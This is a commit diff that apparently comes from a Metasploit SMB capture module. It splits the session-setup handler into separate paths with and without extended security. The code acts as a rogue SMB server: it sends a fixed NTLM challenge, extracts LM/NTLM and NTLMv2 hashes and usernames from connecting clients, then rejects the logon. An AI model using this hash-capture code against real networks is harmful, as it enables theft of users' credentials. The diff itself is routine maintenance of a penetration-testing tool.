Split smb_cmd_session_setup into with/without esn

Extended Security Negotiation
bug/bundler_fix
James Lee 2015-01-16 07:05:10 -06:00
parent 6b6a7e81c9
commit 488847cecc
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
1 changed files with 172 additions and 174 deletions

View File

@ -122,11 +122,11 @@ class Metasploit3 < Msf::Auxiliary
#CIFS SMB_COM_SESSION_SETUP_ANDX request without smb extended security #CIFS SMB_COM_SESSION_SETUP_ANDX request without smb extended security
#This packet contains the lm/ntlm hashes #This packet contains the lm/ntlm hashes
if wordcount == 0x0D if wordcount == 0x0D
smb_cmd_session_setup(c, buff, false) smb_cmd_session_setup(c, buff)
#CIFS SMB_COM_SESSION_SETUP_ANDX request with smb extended security #CIFS SMB_COM_SESSION_SETUP_ANDX request with smb extended security
# can be of type NTLMSS_NEGOCIATE or NTLMSSP_AUTH, # can be of type NTLMSS_NEGOCIATE or NTLMSSP_AUTH,
elsif wordcount == 0x0C elsif wordcount == 0x0C
smb_cmd_session_setup(c, buff, true) smb_cmd_session_setup_with_esn(c, buff)
else else
print_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ") print_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn) smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS, @s_smb_esn)
@ -200,206 +200,204 @@ class Metasploit3 < Msf::Auxiliary
c.put(pkt.to_s) c.put(pkt.to_s)
end end
def smb_cmd_session_setup(c, buff, esn) def smb_cmd_session_setup(c, buff)
smb = @state[c] smb = @state[c]
# extended security has been negotiated pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
if esn pkt.from_s(buff)
pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
pkt.from_s(buff)
securityblobLen = pkt['Payload'].v['SecurityBlobLen'] lm_len = pkt['Payload'].v['PasswordLenLM'] # Always 24
blob = pkt['Payload'].v['Payload'][0,securityblobLen] nt_len = pkt['Payload'].v['PasswordLenNT']
#detect if GSS is being used if nt_len == 24
if blob[0,7] == 'NTLMSSP' arg = {
c_gss = false :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
else :lm_hash => pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0],
c_gss = true :nt_hash => pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0]
start = blob.index('NTLMSSP') }
if start
blob.slice!(0,start)
else
print_status("SMB Capture - Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
end
ntlm_message = NTLM_MESSAGE::parse(blob)
case ntlm_message
when NTLM_MESSAGE::Type1
#Send Session Setup AndX Response NTLMSSP_CHALLENGE response packet
if (ntlm_message.flag & NTLM_CONST::NEGOTIATE_NTLM2_KEY) != 0
c_ntlm_esn = true
else
c_ntlm_esn = false
end
pkt = CONST::SMB_SETUP_NTLMV2_RES_PKT.make_struct
pkt.from_s(buff)
smb_set_defaults(c, pkt)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
pkt['Payload']['SMB'].v['ErrorClass'] = CONST::SMB_STATUS_MORE_PROCESSING_REQUIRED
pkt['Payload']['SMB'].v['Flags1'] = 0x88
pkt['Payload']['SMB'].v['Flags2'] = 0xc807
pkt['Payload']['SMB'].v['WordCount'] = 4
pkt['Payload']['SMB'].v['UserID'] = 2050
pkt['Payload'].v['AndX'] = 0xFF
pkt['Payload'].v['Reserved1'] = 0x00
pkt['Payload'].v['AndXOffset'] = 283 #ignored by client
pkt['Payload'].v['Action'] = 0x0000
win_domain = Rex::Text.to_unicode(@domain_name.upcase)
win_name = Rex::Text.to_unicode(@domain_name.upcase)
dns_domain = Rex::Text.to_unicode(@domain_name.downcase)
dns_name = Rex::Text.to_unicode(@domain_name.downcase)
#create the ntlmssp_challenge security blob
if c_ntlm_esn && @s_ntlm_esn
sb_flag = 0xe28a8215 # ntlm2
else
sb_flag = 0xe2828215 #no ntlm2
end
if c_gss
securityblob = NTLM_UTILS::make_ntlmssp_secblob_chall(
win_domain,
win_name,
dns_domain,
dns_name,
@challenge,
sb_flag
)
else
securityblob = NTLM_UTILS::make_ntlmssp_blob_chall(
win_domain,
win_name,
dns_domain,
dns_name,
@challenge,
sb_flag
)
end
pkt['Payload'].v['SecurityBlobLen'] = securityblob.length
pkt['Payload'].v['Payload'] = securityblob
c.put(pkt.to_s)
when NTLM_MESSAGE::Type3
#we can process the hash and send a status_logon_failure response packet
# Record the remote multiplex ID
smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
lm_len = ntlm_message.lm_response.length # Always 24
nt_len = ntlm_message.ntlm_response.length
if nt_len == 24 # lmv1/ntlmv1 or ntlm2_session
arg = {
:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
:lm_hash => ntlm_message.lm_response.unpack('H*')[0],
:nt_hash => ntlm_message.ntlm_response.unpack('H*')[0]
}
if @s_ntlm_esn && arg[:lm_hash][16,32] == '0' * 32
arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE
end
# if the length of the ntlm response is not 24 then it will be
# bigger and represent an NTLMv2 response
elsif nt_len > 24 # lmv2/ntlmv2
arg = {
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
:lm_hash => ntlm_message.lm_response[0, 16].unpack('H*')[0],
:lm_cli_challenge => ntlm_message.lm_response[16, 8].unpack('H*')[0],
:nt_hash => ntlm_message.ntlm_response[0, 16].unpack('H*')[0],
:nt_cli_challenge => ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0]
}
elsif nt_len == 0
print_status("SMB Capture - Empty hash from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
else
print_status("SMB Capture - Unknown hash type from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
buff = pkt['Payload'].v['Payload']
buff.slice!(0,securityblobLen)
names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
smb[:username] = ntlm_message.user
smb[:domain] = ntlm_message.domain
smb[:peer_os] = names[0]
smb[:peer_lm] = names[1]
begin
smb_get_hash(smb,arg,true)
rescue ::Exception => e
print_error("SMB Capture - Error processing Hash from #{smb[:name]} - #{smb[:ip]} : #{e.class} #{e} #{e.backtrace}")
end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
else
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
end
# if not, we can get the hash and send a status_access_denied response packet
else
pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
pkt.from_s(buff)
lm_len = pkt['Payload'].v['PasswordLenLM'] # Always 24
nt_len = pkt['Payload'].v['PasswordLenNT']
if nt_len == 24
arg = {
:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
:lm_hash => pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0],
:nt_hash => pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0]
}
# if the length of the ntlm response is not 24 then it will be bigger # if the length of the ntlm response is not 24 then it will be bigger
# and represent an NTLMv2 response # and represent an NTLMv2 response
elsif nt_len > 24 elsif nt_len > 24
arg = {
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
:lm_hash => pkt['Payload'].v['Payload'][0, 16].unpack("H*")[0],
:lm_cli_challenge => pkt['Payload'].v['Payload'][16, 8].unpack("H*")[0],
:nt_hash => pkt['Payload'].v['Payload'][lm_len, 16].unpack("H*")[0],
:nt_cli_challenge => pkt['Payload'].v['Payload'][lm_len + 16, nt_len - 16].unpack("H*")[0]
}
elsif nt_len == 0
print_status("SMB Capture - Empty hash captured from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
else
print_status("SMB Capture - Unknown hash type capture from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
buff = pkt['Payload'].v['Payload']
buff.slice!(0, lm_len + nt_len)
names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
smb[:username] = names[0]
smb[:domain] = names[1]
smb[:peer_os] = names[2]
smb[:peer_lm] = names[3]
begin
smb_get_hash(smb,arg,false)
rescue ::Exception => e
print_error("SMB Capture - Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
end
def smb_cmd_session_setup_with_esn(c, buff)
smb = @state[c]
pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
pkt.from_s(buff)
securityblobLen = pkt['Payload'].v['SecurityBlobLen']
blob = pkt['Payload'].v['Payload'][0,securityblobLen]
# detect if GSS is being used
if blob[0,7] == 'NTLMSSP'
c_gss = false
else
c_gss = true
start = blob.index('NTLMSSP')
if start
blob.slice!(0,start)
else
print_status("SMB Capture - Error finding NTLM in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return
end
end
ntlm_message = NTLM_MESSAGE::parse(blob)
case ntlm_message
when NTLM_MESSAGE::Type1
# Send Session Setup AndX Response NTLMSSP_CHALLENGE response packet
if (ntlm_message.flag & NTLM_CONST::NEGOTIATE_NTLM2_KEY) != 0
c_ntlm_esn = true
else
c_ntlm_esn = false
end
pkt = CONST::SMB_SETUP_NTLMV2_RES_PKT.make_struct
pkt.from_s(buff)
smb_set_defaults(c, pkt)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
pkt['Payload']['SMB'].v['ErrorClass'] = CONST::SMB_STATUS_MORE_PROCESSING_REQUIRED
pkt['Payload']['SMB'].v['Flags1'] = 0x88
pkt['Payload']['SMB'].v['Flags2'] = 0xc807
pkt['Payload']['SMB'].v['WordCount'] = 4
pkt['Payload']['SMB'].v['UserID'] = 2050
pkt['Payload'].v['AndX'] = 0xFF
pkt['Payload'].v['Reserved1'] = 0x00
pkt['Payload'].v['AndXOffset'] = 283 #ignored by client
pkt['Payload'].v['Action'] = 0x0000
win_domain = Rex::Text.to_unicode(@domain_name.upcase)
win_name = Rex::Text.to_unicode(@domain_name.upcase)
dns_domain = Rex::Text.to_unicode(@domain_name.downcase)
dns_name = Rex::Text.to_unicode(@domain_name.downcase)
# create the ntlmssp_challenge security blob
if c_ntlm_esn && @s_ntlm_esn
sb_flag = 0xe28a8215 # ntlm2
else
sb_flag = 0xe2828215 # no ntlm2
end
if c_gss
securityblob = NTLM_UTILS::make_ntlmssp_secblob_chall(
win_domain,
win_name,
dns_domain,
dns_name,
@challenge,
sb_flag
)
else
securityblob = NTLM_UTILS::make_ntlmssp_blob_chall(
win_domain,
win_name,
dns_domain,
dns_name,
@challenge,
sb_flag
)
end
pkt['Payload'].v['SecurityBlobLen'] = securityblob.length
pkt['Payload'].v['Payload'] = securityblob
c.put(pkt.to_s)
when NTLM_MESSAGE::Type3
#we can process the hash and send a status_logon_failure response packet
# Record the remote multiplex ID
smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
lm_len = ntlm_message.lm_response.length # Always 24
nt_len = ntlm_message.ntlm_response.length
if nt_len == 24 # lmv1/ntlmv1 or ntlm2_session
arg = {
:ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
:lm_hash => ntlm_message.lm_response.unpack('H*')[0],
:nt_hash => ntlm_message.ntlm_response.unpack('H*')[0]
}
if @s_ntlm_esn && arg[:lm_hash][16,32] == '0' * 32
arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE
end
# if the length of the ntlm response is not 24 then it will be
# bigger and represent an NTLMv2 response
elsif nt_len > 24 # lmv2/ntlmv2
arg = { arg = {
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
:lm_hash => pkt['Payload'].v['Payload'][0, 16].unpack("H*")[0], :lm_hash => ntlm_message.lm_response[0, 16].unpack('H*')[0],
:lm_cli_challenge => pkt['Payload'].v['Payload'][16, 8].unpack("H*")[0], :lm_cli_challenge => ntlm_message.lm_response[16, 8].unpack('H*')[0],
:nt_hash => pkt['Payload'].v['Payload'][lm_len, 16].unpack("H*")[0], :nt_hash => ntlm_message.ntlm_response[0, 16].unpack('H*')[0],
:nt_cli_challenge => pkt['Payload'].v['Payload'][lm_len + 16, nt_len - 16].unpack("H*")[0] :nt_cli_challenge => ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0]
} }
elsif nt_len == 0 elsif nt_len == 0
print_status("SMB Capture - Empty hash captured from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ") print_status("SMB Capture - Empty hash from #{smb[:name]} - #{smb[:ip]} captured, ignoring ... ")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true) smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return return
else else
print_status("SMB Capture - Unknown hash type capture from #{smb[:name]} - #{smb[:ip]}, ignoring ...") print_status("SMB Capture - Unknown hash type from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true) smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
return return
end end
buff = pkt['Payload'].v['Payload'] buff = pkt['Payload'].v['Payload']
buff.slice!(0, lm_len + nt_len) buff.slice!(0,securityblobLen)
names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') } names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
smb[:username] = names[0] smb[:username] = ntlm_message.user
smb[:domain] = names[1] smb[:domain] = ntlm_message.domain
smb[:peer_os] = names[2] smb[:peer_os] = names[0]
smb[:peer_lm] = names[3] smb[:peer_lm] = names[1]
begin begin
smb_get_hash(smb,arg,false) smb_get_hash(smb,arg,true)
rescue ::Exception => e rescue ::Exception => e
print_error("SMB Capture - Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}") print_error("SMB Capture - Error processing Hash from #{smb[:name]} - #{smb[:ip]} : #{e.class} #{e} #{e.backtrace}")
end end
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true) smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
else
smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
end end
end end
def smb_get_hash(smb, arg = {}, esn=true) def smb_get_hash(smb, arg = {}, esn=true)
ntlm_ver = arg[:ntlm_ver] ntlm_ver = arg[:ntlm_ver]